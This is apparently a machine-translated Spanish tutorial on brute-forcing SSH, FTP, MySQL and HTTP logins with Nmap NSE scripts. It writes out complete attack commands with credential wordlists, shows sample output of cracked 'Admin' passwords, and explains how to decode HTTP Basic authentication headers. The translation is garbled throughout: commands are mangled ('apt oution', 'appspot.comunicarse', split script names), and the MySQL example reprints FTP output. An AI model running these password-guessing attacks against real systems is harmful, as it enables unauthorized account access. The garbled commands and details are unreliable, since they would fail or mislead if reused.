Contraseña de forzo con bruto con NMAP

Contraseña de forzo con bruto con NMAP
Para los servicios en línea de la fuerza bruta, las personas normalmente usan el marco Hydra, Medusa y MetaSploit, pero NMAP también se puede utilizar para obtener muchos servicios en línea. Hay scripts NMAP incorporados que admiten FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP y otros diversos servicios. También puede hacer bruto http en formularios HTTP, básicos y métodos de autenticación de digestión. Si tiene NMAP instalado, puede ver estos scripts en el directorio "/usr/share/nmap/scripts".
Ubuntu@ubuntu: ~ $ sudo apt oution && sudo apt actualización
ubuntu@ubuntu: ~ $ sudo apt install nmap -y
ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
ubuntu@ubuntu: ~ $ ls *bruto *

En este tutorial, exploraremos cómo podemos usar NMAP para un ataque de fuerza bruta.

SSH Brute-Force

SSH es un protocolo de administración remota segura y admite la autenticación basada en OpenSSL y contraseña. A la autenticación basada en contraseña de SSH de Force SSH, podemos usar "SSH-Brute.script nse ”nmap.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ssh*bruto*
ssh-brute.NSE

Pase la lista de nombre de usuario y contraseña como argumento para NMAP.

ubuntu@ubuntu: ~ $ nmap --script ssh -brute -p22 192.168.43.181
--script-args userdb = usuarios.txt, passdb = contraseñas.TXT
Comenzando nmap 7.70 (https: // nmap.org) al 2020-02-08 17:09 PKT
Informe de escaneo NMAP para 192.168.43.181
El anfitrión está arriba (0.Latencia 00033S).
Servicio Estatal de Portes
22/tcp abierto ssh
| SSH-Brute:
| Cuentas:
| Admin: P4SSW0RD - Credenciales válidas
| _ Estadísticas: realizó 99 conjeturas en 60 segundos, TPS promedio: 1.7
NMAP HECHO: 1 dirección IP (1 host) escaneada en 60.17 segundos

FTP Brute-Force

FTP es un protocolo de transferencia de archivos que admite la autenticación basada en contraseña. Para FTP de Force Brute, usaremos "FTP-Brute.script nse ”nmap.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*bruto*
ftp-bruto.NSE

Pase la lista de nombre de usuario y contraseña como argumento para NMAP.

ubuntu@ubuntu: ~ $ nmap --script ftp -bruto -p21 192.168.43.181 -script-args
userdb = usuarios.txt, passdb = contraseñas.TXT
Comenzando nmap 7.70 (https: // nmap.org) al 2020-02-08 16:51 PKT
Informe de escaneo NMAP para 192.168.43.181
El anfitrión está arriba (0.Latencia 00021s).
Servicio Estatal de Portes
21/tcp abierto FTP
| ftp-bruto:
| Cuentas:
| Admin: P4SSW0RD - Credenciales válidas
| _ Estadísticas: realizó 99 conjeturas en 20 segundos, TPS promedio: 5.0
NMAP HECHO: 1 dirección IP (1 host) escaneada en 19.50 segundos

MySQL Brute-Force

A veces, MySQL se deja abierto a conexiones externas y permite que cualquiera se conecte a él. Su contraseña se puede descifrar usando NMAP con script "MySQL-Brute".

ubuntu@ubuntu: ~ $ sudo nmap --script mysql -brute -p3306 192.168.43.181
--script-args userdb = usuarios.txt, passdb = contraseñas.TXT
Comenzando nmap 7.70 (https: // nmap.org) al 2020-02-08 16:51 PKT
Informe de escaneo NMAP para 192.168.43.181
El anfitrión está arriba (0.Latencia 00021s).
Servicio Estatal de Portes
3306/tcp abre mysql
| ftp-bruto:
| Cuentas:
| Admin: P4SSW0RD - Credenciales válidas
| _ Estadísticas: realizó 99 conjeturas en 20 segundos, TPS promedio: 5.0
NMAP HECHO: 1 dirección IP (1 host) escaneada en 19.40 segundos

HTTP Brute-Force

HTTP utiliza tres tipos de autenticación para autenticar a los usuarios a los servidores web. Estas metodologías se utilizan en enrutadores, módems y aplicaciones web avanzadas para intercambiar nombres de usuario y contraseñas. Estos tipos son:

Autenticación básica

En el protocolo de autenticación básica HTTP, el navegador codifica el nombre de usuario y la contraseña con Base64 y lo envía bajo encabezado de "autorización". Puedes ver esto en la siguiente captura de pantalla.

Autorización: básico ywrtaw46ywrtaw4 =

Puede base64 decodificar esta cadena para ver el nombre de usuario y la contraseña

ubuntu@ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | base64 -d
Administrador: administrador

La autenticación básica HTTP es insegura porque envía el nombre de usuario y la contraseña en texto sin formato. Cualquier atacante de Man-in-the-Middle puede interceptar fácilmente el tráfico y decodificar la cadena para obtener la contraseña.

Autenticación de resumen

La autenticación HTTP Digest utiliza técnicas de hash para cifrar el nombre de usuario y la contraseña antes de enviarlo al servidor.

Hash1 = MD5 (nombre de usuario: reino: contraseña)
Hash2 = md5 (método: digesturi)
Respuesta = MD5 (Hash1: Nonce: Noncecount: CNONCE: QOP: Hash2)

Puede ver estos valores bajo el encabezado de "autorización".

La autenticación basada en el resumen es segura porque la contraseña no se envía en texto sin formato. Si un atacante de hombre en el medio intercepta el tráfico, no podrá obtener la contraseña de texto sin formato.

Autenticación basada en formularios

Las autenticaciones básicas y digerentes solo admiten la transferencia de nombre de usuario y contraseña, mientras que la autenticación basada en formularios se puede personalizar en función de las necesidades del usuario. Puede crear su propia página web en HTML o JavaScript para aplicar sus propias técnicas de codificación y transferencia.

Por lo general, los datos en la autenticación basado en formularios se envían en texto plano. Para problemas de seguridad, los https deben aplicarse para evitar ataques de hombre en el medio.

Podemos fuerza bruta todo tipo de autenticación HTTP usando nmap. Usaremos el script "http-bruto" para ese propósito.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*http*bruto*
http-bruto.NSE

Para probar este guión NMAP, resolveremos un desafío de fuerza bruta alojado públicamente por Pentester Academy en esta URL http: // Pentesteracademylab.appspot.com/lab/webapp/basicauth.

Necesitamos proporcionar todo lo que incluye nombre de host, URI, método de solicitud y diccionarios por separado como argumento de script.

ubuntu@ubuntu: ~ $ sudo nmap -p80 --script http -bruto pentesteracademylab.appspot.comunicarse
--script-args http-bruto.Nombre de host = Pentesteracademylab.appspot.comunicarse,
http-bruto.ruta =/lab/webapp/basicauth, userdb = usuarios.txt, passdb = contraseñas.TXT,
http-bruto.método = publicar
Comenzando nmap 7.70 (https: // nmap.org) al 2020-02-08 21:37 PKT
Informe de escaneo NMAP para Pentesteracademylab.appspot.com (216.58.210.84)
El anfitrión está arriba (0.Latencia 20).
Otras direcciones para Pentesteracademylab.appspot.com (no escaneado): 2a00: 1450: 4018: 803 :: 2014
récord de rdns para 216.58.210.84: MCT01S06-In-F84.1e100.neto
Servicio Estatal de Portes
80/tcp abre http
| http-bruto:
| Cuentas:
| Admin: AADDD - Credenciales válidas
| _ Estadísticas: realizó 165 conjeturas en 29 segundos, TPS promedio: 5.3
NMAP realizado: 1 dirección IP (1 host) escaneada en 31.22 segundos

Conclusión

NMAP se puede usar para hacer muchas cosas a pesar de solo escaneo de puertos simple. Puede reemplazar Metasploit, Hydra, Medusa y muchas otras herramientas hechas especialmente para el forzamiento bruto en línea. NMAP tiene scripts integrados simples y fáciles de usar que la fuerza bruta casi todos los servicios, incluidos HTTP, Telnel, SSH, MySQL, Samba y otros.